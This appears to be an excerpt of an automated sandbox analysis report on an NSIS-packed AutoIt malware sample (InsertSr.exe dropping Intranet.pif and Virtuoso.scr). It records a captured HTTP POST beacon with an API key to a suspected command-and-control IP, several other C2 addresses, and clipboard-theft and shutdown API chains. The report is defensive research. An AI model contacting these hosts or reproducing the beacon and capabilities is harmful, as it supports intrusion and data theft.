      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 162X-Api-Key: GBhb1vepAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 2a 53 1b 24 56 0a 5e 11 1d 0a 5e 5c 00 1b 22 02 09 38 22 35 1b 19 24 23 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2d 39 08 25 5d 0f 28 24 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 03 30 25 5a 25 34 33 1a 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 57 1f 3e 48 21 2d 11 5c 1f 13 31 45 4f 4d 03 02 5c 45 59 4d 5f 5e 0a 02 52 56 0c 53 5e 01 57 5c 0d 03 59 06 56 0e 08 57 5d 5e 00 56 58 07 0c 04 00 59 56 53 4b 1a Data Ascii: M*L\K*S$V^^\"8"5$#EOM:DSE-9%]($LJK9AUL0%Z%43EOM9L\KWW>H!-\1EOM\EYM_^RVS^W\YVW]^VXYVSK
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
      Source: Intranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243X-Content-Type-OptionsP.
      Source: Intranet.pif, 00000013.00000002.3383490052.000000000A0EE000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F0000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A122000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
      Source: Virtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91188.130.206.243:80P
      Source: Virtuoso.scr, 00000016.00000002.3383635119.000000000A10C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
      Source: Intranet.pif, 00000013.00000002.3383490052.000000000A0E2000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A12C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3382375239.000000000A07A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253P
      Source: InsertSr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
      Source: InsertSr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
      Source: InsertSr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
      Source: InsertSr.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
      Source: InsertSr.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
      Source: InsertSr.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
      Source: InsertSr.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
      Source: InsertSr.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
      Source: InsertSr.exeString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
      Source: InsertSr.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: InsertSr.exeString found in binary or memory: http://ocsp.digicert.com0
      Source: InsertSr.exeString found in binary or memory: http://ocsp.digicert.com0A
      Source: InsertSr.exeString found in binary or memory: http://ocsp.digicert.com0C
      Source: InsertSr.exeString found in binary or memory: http://ocsp.digicert.com0X
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
      Source: InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000000.2154258238.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Virtuoso.scr, 00000011.00000000.2289162050.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Intranet.pif, 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp, Virtuoso.scr, 00000016.00000000.2724020520.0000000000249000.00000002.00000001.01000000.00000009.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: InsertSr.exeString found in binary or memory: http://www.digicert.com/CPS0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: Virtuoso.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/0
      Source: InsertSr.exe, 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmp, InsertSr.exe, 00000000.00000002.2187271268.0000000002917000.00000004.00000020.00020000.00000000.sdmp, Intranet.pif, 0000000B.00000003.2170469514.0000000003C45000.00000004.00000800.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1A4000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A156000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3382177878.000000000A064000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A191000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3385344984.000000000A1B9000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A0F6000.00000004.00001000.00020000.00000000.sdmp, Intranet.pif, 00000013.00000002.3383490052.000000000A13E000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3384251154.000000000A1B6000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A13C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A14C000.00000004.00001000.00020000.00000000.sdmp, Virtuoso.scr, 00000016.00000002.3383635119.000000000A12A000.00000004.00001000.00020000.00000000.sdmp, Faculty.0.dr, Intranet.pif.2.dr, Virtuoso.scr.11.drString found in binary or memory: https://www.globalsign.com/repository/06
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00514830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_00514830
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001F4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,22_2_001F4830
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00514632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_00514632
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0052D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_0052D164
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_0020D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,22_2_0020D164

      System Summary

      barindex
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00504254: CreateFileW,DeviceIoControl,CloseHandle,19_2_00504254
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004F8F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_004F8F2E
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_00505778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_00505778
      Source: C:\Users\user\AppData\Local\Immersive Creations Co\Virtuoso.scrCode function: 22_2_001E5778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,22_2_001E5778
      Source: C:\Users\user\Desktop\InsertSr.exeFile created: C:\Windows\MatthewSouthernJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeFile created: C:\Windows\CombinedStartsJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeFile created: C:\Windows\PastDesignsJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeFile created: C:\Windows\InterestedHobbiesJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeFile created: C:\Windows\ChancellorFuneralJump to behavior
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_0040497C0_2_0040497C
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_00406ED20_2_00406ED2
      Source: C:\Users\user\Desktop\InsertSr.exeCode function: 0_2_004074BB0_2_004074BB
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004C23F519_2_004C23F5
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_0052840019_2_00528400
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D650219_2_004D6502
      Source: C:\Users\user\AppData\Local\Temp\316094\Intranet.pifCode function: 19_2_004D265E19_2_004D265E
